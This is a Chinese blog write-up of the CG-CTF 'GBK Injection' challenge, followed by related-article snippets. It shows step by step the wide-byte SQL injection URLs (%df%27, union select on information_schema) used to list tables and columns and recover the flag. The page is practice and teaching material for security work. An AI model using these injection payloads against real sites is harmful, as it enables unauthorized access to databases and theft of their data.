CG CTF GBK Injection

最新推荐文章于 2020-12-10 01:01:03 发布
最新推荐文章于 2020-12-10 01:01:03 发布
阅读量192 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46389295/article/details/104464795
版权

题目链接

GBK Injection想到宽字节注入,首先了解宽字节注入的原理 链接

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 order by 2#
在这里插入图片描述
发现#被过滤掉了,遂使用%23(url编码)

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 order by 2%23
在这里插入图片描述

判断出表中有两列,就可以用:union select获取当前的库了
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 union select 1,database()%23
在这里插入图片描述
没有爆出库的信息emm…因为没有and 1=2,又因为这个地方可能只接受一个参数
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 and 1=2 union select 1,database()%23

在这里插入图片描述
当前的库名为sae-chinalover,通过库名爆表名
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652D6368696E616C6F766572%23
在这里插入图片描述
爆news表的列
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x6E657773%23
在这里插入图片描述
得出id,title两列
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 and 1=2 union select 1,group_concat(id,title) from news limit 0,1%23

发现没有flag,按照上面的流程重复

在ctf4表中找到flag

flag{this_is_sqli_flag}

兰秋一ጿ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CG-CTF GBK Injection
venu_s的博客
11-03 344
CG-CTF WEB GBK Injection
gbk injection
sworddancing is the best one
09-27 956
以下是我在南邮上做的一道宽字节注入题,先将笔记总结于下,题目:   将网址复制下来,因为这将是我们进行注入的数据库的位置所在,因为该题提示是gbk数据库,所以咱们就有利用宽字节注入来解题的思路,接下来咱们用到sql注入工具的一款,sqlmap: 首先我们需要爆出数据库命令如下(爆出当前数据库(%df%27是双字节不转义单引号实现注入的方法--原理我会另外总结一片笔记出来链接:https://b...
CG-CTF-Web-GBK Injection
1stPeak's Blog
07-01 1280
GBK Injection 1.题目 2.首先我们进入题目地址,发现下图所示,首先猜测可能存在sql注入 3.于是我们尝试',但被转义了 4.被转义了,那咋办,此时,想到了URL中%df与\结合会变成運,如下图 5.因此我们可以闭合id的值,使用#,--空格或--+来注释最后一个’ 这里对#进行了过滤,但我们可以使用%23进行绕过 –空格也是标准的SQl注释语句,但这里对空格进行了过滤,...
CGCTTF-GBK Injection
weixin_43803070的博客
05-13 352
查看题目给的信息,一看就知道是宽字节注入啦。 http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1�' 页面报错 判断字段,4的时候报错: http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1�' order by 4--+ 2的时候,回显正常: http://chinalover.sina...
CGCTF——GBK Injection
知足且坚定,温柔且上进
02-10 414
该题提示是gbk数据库,所以咱们就有利用宽字节注入来解题的思路。 (%df%27是双字节不转义单引号实现注入的方法) 原理参考:https://blog.csdn.net/weixin_42419856/article/details/82872653 参考2:https://lyiang.wordpress.com/2015/06/09/sql%E6%B3%A8%E5%85%A5%EF%BC%...
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
ctf拼图例题-puzzle
04-13
CTF(Capture The Flag)竞赛中,"puzzle"是一种常见的挑战类型,它涉及到解决各种谜题以获取关键信息或解密数据。本资源包包含了一组与CTF拼图相关的图片,很可能是参赛者需要解读的线索。每个图片可能代表一个...
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
CTF题库超详细资源合集
最新发布
06-14
ctf题库 CTF 题⽬类型⼀般分为 Web 渗透、RE 逆向、Misc 杂项、PWN ⼆进制漏洞利⽤、Crypto 密码破译。 在传统的CTF线上⽐赛中,Web类题⽬是主要的题型之⼀,相较于⼆进制、逆向等类型的题⽬,参赛者不需掌握系统...
SilentEye,用于CTF比赛
01-24
SilentEye,用于CTF比赛
CG CTF WEB GBK Injection
无限迭代中......
07-02 461
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1 题解: ctf4表里有个假flag 1、 id=1%df' and 1=2 %23 2、 id=1%df' order by 2 %23 3、 id=1%df' and 1=2 union select 1,2 %23 4、 id=1%df' and 1=2 uni...
gbk双字节注入
左手诗人 右手剑客
06-12 361
<?php //连接数据库部分,注意使用了gbk编码 $conn = mysql_connect('localhost', 'root', 'toor!@#$') or die('bad!'); mysql_query("SET NAMES 'gbk'"); mysql_select_db('test', $conn) OR emMsg("连接数据库失败,未找到您填写的数据库");...
CG-CTF SQL Injection
venu_s的博客
11-25 562
SQL Injection 题目 2.进入题目所给的场景,我们会看见如下图的内容 3.查看一下源码 <!-- #GOAL: login as admin,then get the flag; error_reporting(0); require 'db.inc.php'; function clean($str){ if(get_magic_quotes_gpc()){ $...
南邮CTF injection-3 宽字节注入
include_heqile的博客
03-22 3041
从昨天晚上开始做的,结果踩了一个坑,干到了凌晨1点,电脑都自动关机了,也没做出来,电脑关机之后,又用手机查了一下,知道了应该用表名的16进制形式来进行爆表,然后到今天上午才做完,还是上计组的时候用手机的火狐做的,手机做是真的难受宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码表名库名的十六进制形式: 字符形式的表名: ctf表示成十...
injection
weixin_30598225的博客
03-10 259
injection(注入): 注入是Spring的思想,在使用Spring进行开发时,可以将对象交给spring进行管理,在初始化时spring创建一批对象,当你需要用的时候只要从spring的容器中获取对象,而不用自己去new,当然在对象创建的时候可以注入另一个对象。 通常是new一个依赖类再调用类实例的方法,这种开发存在的问题是new的类实例不好统一管理。Spring提出了依赖注入的思想...
CG CTF-Web-SQL Injection
feng的博客
09-08 246
前言 又被SQL注入打倒了。感觉自己对SQL注入这一块真的好差,需要好好补一补了。 WP 进入环境之后,要么直接f12,要么用burp抓包之后看response来看PHP代码,来进行代码审计。 <?php #GOAL: login as admin,then get the flag; error_reporting(0); require 'db.inc.php'; function clean($str){ if(get_magic_quotes_gpc()){ $str=strips
一道审计型注入CTF题解(injection_cut)
bylfsj的博客
10-30 593
0ops给的一道基础题,搞了半天没搞出来,后来想起了雨牛几年前审计的一则案例:就是利用数据库的字段长度来截取得要的反斜杠 进而吃单引号 结合二次注入再在第二个点进行注入 首先index.php中进行了全局GPC if (!get_magic_quotes_gpc()){ foreach($_POST as $key => $value){ $_POST[$key] = addslas...
CG CTF WEB SQL Injection
无限迭代中......
07-04 619
http://chinalover.sinaapp.com/web15/index.php 题解: <!-- #GOAL: login as admin,then get the flag; error_reporting(0); require 'db.inc.php'; function clean($str){ if(get_magic_quotes_gpc()){ ...
web python template injection_CTF引出对Python模板注入的思考
weixin_39630466的博客
12-10 331
前记最近在做ctf的时候碰到了两道跟python模板注入有关的题,在看了网上各位大佬们的解析之后把flag解了出来,但是对原理还是不太清晰,于是心血来潮看了看。题解第一题是:Web_python_template_injection题目如下:由于题目有提示模板注入,于是尝试构造payload,如下:220.249.52.133:46596/{{1+1}}发现在URL后出现了1+1的返回值,说明传入...
CTF密码学基础与编码解析
CTF中,Unicode常以\u转义序列的形式出现,例如将文本"You had me at hello"编码为"\u0059\u006f\u0075\u0020\u0068\u0065\u006c\u006c\u006f"。解码这类题目需要理解Unicode编码规则,并能将其转换回原始文本。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值